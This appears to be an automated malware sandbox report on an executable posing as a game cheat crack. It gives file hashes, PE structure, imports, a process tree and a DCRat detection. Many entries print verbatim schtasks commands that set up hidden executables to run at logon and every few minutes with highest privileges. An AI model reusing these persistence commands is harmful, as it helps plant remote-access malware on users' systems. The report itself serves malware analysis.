            Entropy (8bit):6.081184207528029
            Encrypted:false
            SSDEEP:12288:7f+nSU0jXIzPk1zfnXX695aByBtOCDLRkiBI9GdM:TpTjXIzPkxnXX6WAHOcaiOGdM
            MD5:EF0F547DFEF34380202700FDEDDC1CC8
            SHA1:7BEEA5749F899D22F2270D317F48A4C049BF2C9E
            SHA-256:73FF007B685023EAD1E8A9840B6717F2B3CEDD1D005CE578106E08BAE0AFDF43
            SHA-512:DB290993A402BD976EDDA0DD8597F736C844D064E3096C8F0AD5E1CEB43FD2892D79BA587E24CDEC31DAE3F9645571FDA8E55D62B105C03E2DF8CA3D7C3E5417
            Malicious:true
            Antivirus:
            • Antivirus: ReversingLabs, Detection: 88%
            Process:C:\Browserfont\refdhcp.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):847360
            Entropy (8bit):6.081184207528029
            Encrypted:false
            SSDEEP:12288:7f+nSU0jXIzPk1zfnXX695aByBtOCDLRkiBI9GdM:TpTjXIzPkxnXX6WAHOcaiOGdM
            MD5:EF0F547DFEF34380202700FDEDDC1CC8
            SHA1:7BEEA5749F899D22F2270D317F48A4C049BF2C9E
            SHA-256:73FF007B685023EAD1E8A9840B6717F2B3CEDD1D005CE578106E08BAE0AFDF43
            SHA-512:DB290993A402BD976EDDA0DD8597F736C844D064E3096C8F0AD5E1CEB43FD2892D79BA587E24CDEC31DAE3F9645571FDA8E55D62B105C03E2DF8CA3D7C3E5417
            Malicious:true
            Antivirus:
            • Antivirus: ReversingLabs, Detection: 88%
            Process:C:\Browserfont\refdhcp.exe
            File Type:ASCII text, with very long lines (889), with no line terminators
            Category:dropped
            Size (bytes):889
            Entropy (8bit):5.912617079137104
            Encrypted:false
            SSDEEP:24:Z+qZbNAFcX2wliB+UPjwxkRTwVyNaems5KLwFEtDsb+F:Z+qZpGwlidPjwxkRkVa75KVZEu
            MD5:5966742A42BE3B93B0C714C7841F6D81
            SHA1:B4931863F0B08A88AF8336514EA1349AE8070492
            SHA-256:D6C584AB88A8174E66B2C8561851225EAB953BA660519AAEA96C854478117D14
            SHA-512:3CD26A8441DAF2FD2DE4DBC62000920582FC9974F09079B63FBDC720BA6F17B470F15A588E5A5EB815858B592C0032AAAD611A9AD1D2481597A91A4817F87816
            Malicious:false
            Process:C:\Browserfont\refdhcp.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):847360
            Entropy (8bit):6.081184207528029
            Encrypted:false
            SSDEEP:12288:7f+nSU0jXIzPk1zfnXX695aByBtOCDLRkiBI9GdM:TpTjXIzPkxnXX6WAHOcaiOGdM
            MD5:EF0F547DFEF34380202700FDEDDC1CC8
            SHA1:7BEEA5749F899D22F2270D317F48A4C049BF2C9E
            SHA-256:73FF007B685023EAD1E8A9840B6717F2B3CEDD1D005CE578106E08BAE0AFDF43
            SHA-512:DB290993A402BD976EDDA0DD8597F736C844D064E3096C8F0AD5E1CEB43FD2892D79BA587E24CDEC31DAE3F9645571FDA8E55D62B105C03E2DF8CA3D7C3E5417
            Malicious:true
            Antivirus:
            • Antivirus: ReversingLabs, Detection: 88%
            Process:C:\Browserfont\refdhcp.exe
            File Type:ASCII text, with very long lines (340), with no line terminators
            Category:dropped
            Size (bytes):340
            Entropy (8bit):5.825457644940895
            Encrypted:false
            SSDEEP:6:eijjT9EOVekGIsWfMxJren0CNDmxxWRSHjRUeDSCwU8LySvEiuAfhgk/Sh2n:eijvxRWrJrpmUWRCVXOCMy0Emh8A
            MD5:37774C4161F44DDEB3719EE4D6B06003
            SHA1:9CB8D4B09FF7BAF58011B7C641EDA321FD24A7F3
            SHA-256:786BD740D2033F560ABEBDC150C44E54F334AE249D73BFAC9FA05DE472F25577
            SHA-512:866804135018C3AA1A306F9F8A200058DCA74B14B7147C9F5320308D980B07E464D9908C2FF1A58CBFA894C426F73A838482FCDF09D51453F359AB7AF46D5063
            Malicious:false
            Preview:CxqVosujafSlPmF6XPx36FaLAoQhkO69Lo0TicLqBHHGeWArGmgYcSY6XeUAcN9MiTakvvY4DG2y7Uronia7shg2Q35EILOxH5hL5a5VOlUWZj9DxqW4wBeAwhT2zTw22EqCwfsNmFtGNKcr42RbzUBGagYYGDf4zcdU26QR7JRqSYxmEm77CUChDkmPHUGjkzQvqIz8l9epCUyBtwTdFi1fZ5RRUAKmCsGcHC56x9VDzWfswkgUBndC8vVu0inkz1nUOV3q1WqFMypCaietezlZODeWqKFPWuO8tKebqzdo6YzKGSUSD4G9QOGK1hAqRbtcjrTQDDCoW7d0NTPY
            Process:C:\Browserfont\refdhcp.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):847360
            Entropy (8bit):6.081184207528029
            Encrypted:false
            SSDEEP:12288:7f+nSU0jXIzPk1zfnXX695aByBtOCDLRkiBI9GdM:TpTjXIzPkxnXX6WAHOcaiOGdM
            MD5:EF0F547DFEF34380202700FDEDDC1CC8
            SHA1:7BEEA5749F899D22F2270D317F48A4C049BF2C9E
            SHA-256:73FF007B685023EAD1E8A9840B6717F2B3CEDD1D005CE578106E08BAE0AFDF43
            SHA-512:DB290993A402BD976EDDA0DD8597F736C844D064E3096C8F0AD5E1CEB43FD2892D79BA587E24CDEC31DAE3F9645571FDA8E55D62B105C03E2DF8CA3D7C3E5417
            Malicious:true
            Antivirus:
            • Antivirus: ReversingLabs, Detection: 88%
            File type:PE32 executable (GUI) Intel 80386, for MS Windows
            Entropy (8bit):7.993926033393968
            TrID:
            • Win32 Executable (generic) a (10002005/4) 99.94%
            • Win16/32 Executable Delphi generic (2074/23) 0.02%
            • Generic Win/DOS Executable (2004/3) 0.02%
            • DOS Executable Generic (2002/1) 0.02%
            • VXD Driver (31/22) 0.00%
            File name:RFAwChXSve.exe
            File size:13'752'832 bytes
            MD5:47ca55cdb30db720d739bfb73504b928
            SHA1:d0292acd8f617ce49e1830bd47e108c4c3f833e2
            SHA256:4cc156f578777710f3ce0c217664b9830ddfcab407f0c6de0cae10d5501d1ca1
            SHA512:6b265038b6f7b92238dcd33a9fac5cfca359df72107d037e038417d86a3a3bc79a46552ae3bfa8ab2aba257a72bb1b7f1584bc9ca3402483677ee9314d02af74
            SSDEEP:393216:cjMG3LZAmatuaWyJbpuSvTW00xyysfbtNcEH:cjr6matuapuSrW00xl4wEH
            TLSH:DDD63345EBAAB523E16489F46B3C633BD86DC9C3C9C79631B08851D841F0B098FE5EE5
            Icon Hash:90cececece8e8eb0
            Entrypoint:0x401ad8
            Entrypoint Section:.text
            Digitally signed:false
            Imagebase:0x400000
            Subsystem:windows gui
            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            DLL Characteristics:
            Time Stamp:0x4EB8440D [Mon Nov 7 20:48:13 2011 UTC]
            TLS Callbacks:
            CLR (.Net) Version:
            OS Version Major:4
            OS Version Minor:0
            File Version Major:4
            File Version Minor:0
            Subsystem Version Major:4
            Subsystem Version Minor:0
            Import Hash:94400fe3e62cd2376124312fe435b8e4
            Instruction
            call 00007F94F0875608h
            mov dword ptr [0040300Bh], eax
            push 00000000h
            call 00007F94F0875614h
            mov dword ptr [00403013h], eax
            call 00007F94F0875616h
            mov dword ptr [00410670h], eax
            push 0000000Ah
            push dword ptr [0040300Bh]
            push 00000000h
            push dword ptr [00403013h]
            call 00007F94F0874A58h
            push 00000000h
            call 00007F94F08755BFh
            jmp dword ptr [004020B4h]
            jmp dword ptr [004020B0h]
            jmp dword ptr [004020ACh]
            jmp dword ptr [004020A8h]
            jmp dword ptr [004020A4h]
            jmp dword ptr [004020A0h]
            jmp dword ptr [0040209Ch]
            jmp dword ptr [00402098h]
            jmp dword ptr [00402094h]
            jmp dword ptr [00402090h]
            jmp dword ptr [0040208Ch]
            jmp dword ptr [00402088h]
            jmp dword ptr [00402084h]
            jmp dword ptr [00402034h]
            jmp dword ptr [00402038h]
            jmp dword ptr [0040203Ch]
            jmp dword ptr [00402040h]
            jmp dword ptr [00402044h]
            jmp dword ptr [00402048h]
            jmp dword ptr [0040204Ch]
            jmp dword ptr [00402050h]
            jmp dword ptr [00402054h]
            jmp dword ptr [00402000h]
            jmp dword ptr [00000000h]
            Name | Virtual Address | Virtual Size | Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_IMPORT | 0x20bc | 0x50 | .rdata
            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x11000 | 0xd1bb0c | .rsrc
            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0xbc | .rdata
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
            Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
            .text | 0x1000 | 0xc1c | 0xe00 | 4b3f16d7c1b1a72b03a6b6a1781a9421 | False | 0.4771205357142857 | data | 5.123931017549605 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            .rdata | 0x2000 | 0x4c0 | 0x600 | 128067a33e449c96b8dc66824ad4bcd5 | False | 0.4088541666666667 | data | 4.217635826521946 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .data | 0x3000 | 0xd6f0 | 0x600 | 7701054449ed29f5803ce4903a7bfc7b | False | 0.16927083333333334 | data | 1.725550805200182 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            .rsrc | 0x11000 | 0xd1bb0c | 0xd1bc00 | 458095619badf2fa81abecdb3513ae21 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Name | RVA | Size | Type | Language | Country | ZLIB Complexity
            IMAGE | 0x1110c | 0x42 | PC bitmap, Windows 3.x format, 1 x 1 x 1, image size 4, cbSize 66, bits offset 62 | English | United States | 0.5151515151515151
            RT_RCDATA | 0x11150 | 0x367ef9 | data | | | 0.9939203262329102
            RT_RCDATA | 0x37904c | 0x9b3a08 | data | | | 0.996891975402832
            RT_RCDATA | 0xd2ca54 | 0xb8 | data | | | 0.7010869565217391
            DLL | Import
            user32.dll | UpdateWindow, TranslateMessage, ShowWindow, SendMessageA, RegisterClassExA, PostQuitMessage, MessageBoxA, LoadIconA, LoadCursorA, GetMessageA, DispatchMessageA, DefWindowProcA, CreateWindowExA
            kernel32.dll | GetModuleHandleA, HeapAlloc, lstrlenA, lstrcpynA, lstrcpyA, lstrcatA, WriteFile, SizeofResource, SetFileAttributesA, RtlMoveMemory, LockResource, LoadResource, LoadLibraryA, CloseHandle, CreateFileA, ExitProcess, FindResourceA, FreeResource, GetCommandLineA, GetEnvironmentVariableA, GetFileSize, GetModuleFileNameA, GlobalFree, GetProcAddress, GetProcessHeap, GetSystemDirectoryA, GetTempPathA, GetWindowsDirectoryA, GlobalAlloc, HeapFree
            shlwapi.dll | PathFindFileNameA
            Language of compilation system | Country where language is spoken
            English | United States
            Skipped network analysis since the amount of network traffic is too extensive. Please download the PCAP and check manually.

            Target ID:0
            Start time:20:57:06
            Start date:30/05/2024
            Path:C:\Users\user\Desktop\RFAwChXSve.exe
            Wow64 process (32bit):true
            Commandline:"C:\Users\user\Desktop\RFAwChXSve.exe"
            Imagebase:0x400000
            File size:13'752'832 bytes
            MD5 hash:47CA55CDB30DB720D739BFB73504B928
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low
            Has exited:true

            Target ID:1
            Start time:20:57:07
            Start date:30/05/2024
            Path:C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe
            Wow64 process (32bit):true
            Commandline:"C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe"
            Imagebase:0x6a0000
            File size:6'004'632 bytes
            MD5 hash:938199CA646378B696716037AFC964BA
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Antivirus matches:
            • Detection: 0%, ReversingLabs
            Reputation:low
            Has exited:true

            Target ID:2
            Start time:20:57:09
            Start date:30/05/2024
            Path:C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exe
            Wow64 process (32bit):true
            Commandline:"C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exe"
            Imagebase:0x400000
            File size:10'172'928 bytes
            MD5 hash:C4546882C186DC99C68501D0DB7FBB21
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Antivirus matches:
            • Detection: 100%, Avira
            • Detection: 100%, Joe Sandbox ML
            • Detection: 100%, ReversingLabs
            Reputation:low
            Has exited:true

            Target ID:3
            Start time:20:57:09
            Start date:30/05/2024
            Path:C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe
            Wow64 process (32bit):true
            Commandline:C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe --crashpad --no-rate-limit --database=C:\Users\user\AppData\Local\Temp\crashpad_roblox --metrics-dir=C:\Users\user\AppData\Local\Temp\crashpad_roblox --url=https://uploads.backtrace.rbx.com/post --annotation=RobloxChannel=production --annotation=RobloxGitHash=cd8f60aa5fd1b833d79957e664b9bd42f71216a2 --annotation=UploadAttachmentKiloByteLimit=100 --annotation=UploadPercentage=100 --annotation=format=minidump --annotation=token=a2440b0bfdada85f34d79b43839f2b49ea6bba474bd7d126e844bc119271a1c3 --initial-client-data=0x8b4,0x8b8,0x8bc,0x884,0x8c0,0x12c9d84,0x12c9d94,0x12c9da4
            Imagebase:0x6a0000
            File size:6'004'632 bytes
            MD5 hash:938199CA646378B696716037AFC964BA
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low
            Has exited:true

            Target ID:4
            Start time:20:57:10
            Start date:30/05/2024
            Path:C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exe
            Wow64 process (32bit):false
            Commandline:"C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exe"
            Imagebase:0x140000000
            File size:9'388'032 bytes
            MD5 hash:830511D481D3B0D9E73F8475159EBEE3
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Antivirus matches:
            • Detection: 100%, Joe Sandbox ML
            • Detection: 53%, ReversingLabs
            Reputation:low
            Has exited:false

            Target ID:5
            Start time:20:57:10
            Start date:30/05/2024
            Path:C:\Users\user\AppData\Local\Temp\AkrienCrack.exe
            Wow64 process (32bit):true
            Commandline:"C:\Users\user\AppData\Local\Temp\AkrienCrack.exe"
            Imagebase:0xb40000
            File size:1'164'347 bytes
            MD5 hash:F01B45525A3718CEEDFCC788392DFE50
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Antivirus matches:
            • Detection: 100%, Avira
            • Detection: 100%, Joe Sandbox ML
            • Detection: 75%, ReversingLabs
            Reputation:low
            Has exited:true

            Target ID:6
            Start time:20:57:11
            Start date:30/05/2024
            Path:C:\Windows\SysWOW64\wscript.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\System32\WScript.exe" "C:\Browserfont\ilq5gxa6sOuB.vbe"
            Imagebase:0x100000
            File size:147'456 bytes
            MD5 hash:FF00E0480075B095948000BDC66E81F0
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:moderate
            Has exited:true

            Target ID:7
            Start time:20:57:18
            Start date:30/05/2024
            Path:C:\Windows\SysWOW64\cmd.exe
            Wow64 process (32bit):true
            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Browserfont\hryZMJ.bat" "
            Imagebase:0x240000
            File size:236'544 bytes
            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:8
            Start time:20:57:18
            Start date:30/05/2024
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff7699e0000
            File size:862'208 bytes
            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:9
            Start time:20:57:18
            Start date:30/05/2024
            Path:C:\Browserfont\refdhcp.exe
            Wow64 process (32bit):false
            Commandline:"C:\Browserfont\refdhcp.exe"
            Imagebase:0x280000
            File size:847'360 bytes
            MD5 hash:EF0F547DFEF34380202700FDEDDC1CC8
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000009.00000002.1917392588.0000000002D5C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000009.00000002.1917392588.0000000002821000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            Antivirus matches:
            • Detection: 100%, Avira
            • Detection: 100%, Joe Sandbox ML
            • Detection: 88%, ReversingLabs
            Reputation:low
            Has exited:true

            Target ID:10
            Start time:20:57:19
            Start date:30/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 6 /tr "'C:\Users\Default\Saved Games\RDMwYUvZPK.exe'" /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:11
            Start time:20:57:19
            Start date:30/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "RDMwYUvZPK" /sc ONLOGON /tr "'C:\Users\Default\Saved Games\RDMwYUvZPK.exe'" /rl HIGHEST /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:12
            Start time:20:57:19
            Start date:30/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 13 /tr "'C:\Users\Default\Saved Games\RDMwYUvZPK.exe'" /rl HIGHEST /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:13
            Start time:20:57:19
            Start date:30/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 7 /tr "'C:\Browserfont\RDMwYUvZPK.exe'" /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:14
            Start time:20:57:20
            Start date:30/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "RDMwYUvZPK" /sc ONLOGON /tr "'C:\Browserfont\RDMwYUvZPK.exe'" /rl HIGHEST /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:15
            Start time:20:57:20
            Start date:30/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 11 /tr "'C:\Browserfont\RDMwYUvZPK.exe'" /rl HIGHEST /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:16
            Start time:20:57:20
            Start date:30/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 10 /tr "'C:\Users\user\Templates\RDMwYUvZPK.exe'" /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:17
            Start time:20:57:20
            Start date:30/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "RDMwYUvZPK" /sc ONLOGON /tr "'C:\Users\user\Templates\RDMwYUvZPK.exe'" /rl HIGHEST /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:18
            Start time:20:57:20
            Start date:30/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 11 /tr "'C:\Users\user\Templates\RDMwYUvZPK.exe'" /rl HIGHEST /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:19
            Start time:20:57:20
            Start date:30/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 11 /tr "'C:\Users\user\RDMwYUvZPK.exe'" /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:20
            Start time:20:57:20
            Start date:30/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "RDMwYUvZPK" /sc ONLOGON /tr "'C:\Users\user\RDMwYUvZPK.exe'" /rl HIGHEST /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:21
            Start time:20:57:20
            Start date:30/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 10 /tr "'C:\Users\user\RDMwYUvZPK.exe'" /rl HIGHEST /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:22
            Start time:20:57:20
            Start date:30/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "SgrmBrokerS" /sc MINUTE /mo 12 /tr "'C:\AkrienAntiLeak\SgrmBroker.exe'" /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:23
            Start time:20:57:20
            Start date:30/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "SgrmBroker" /sc ONLOGON /tr "'C:\AkrienAntiLeak\SgrmBroker.exe'" /rl HIGHEST /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:24
            Start time:20:57:20
            Start date:30/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "SgrmBrokerS" /sc MINUTE /mo 7 /tr "'C:\AkrienAntiLeak\SgrmBroker.exe'" /rl HIGHEST /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:25
            Start time:20:57:20
            Start date:30/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "servicess" /sc MINUTE /mo 9 /tr "'C:\Browserfont\services.exe'" /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:26
            Start time:20:57:20
            Start date:30/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Browserfont\services.exe'" /rl HIGHEST /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:27
            Start time:20:57:20
            Start date:30/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "servicess" /sc MINUTE /mo 7 /tr "'C:\Browserfont\services.exe'" /rl HIGHEST /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:28
            Start time:20:57:20
            Start date:30/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 5 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\RDMwYUvZPK.exe'" /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:29
            Start time:20:57:20
            Start date:30/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "RDMwYUvZPK" /sc ONLOGON /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\RDMwYUvZPK.exe'" /rl HIGHEST /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:30
            Start time:20:57:20
            Start date:30/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 8 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\RDMwYUvZPK.exe'" /rl HIGHEST /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:32
            Start time:20:57:21
            Start date:30/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 12 /tr "'C:\Users\user\RDMwYUvZPK.exe'" /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:33
            Start time:20:57:21
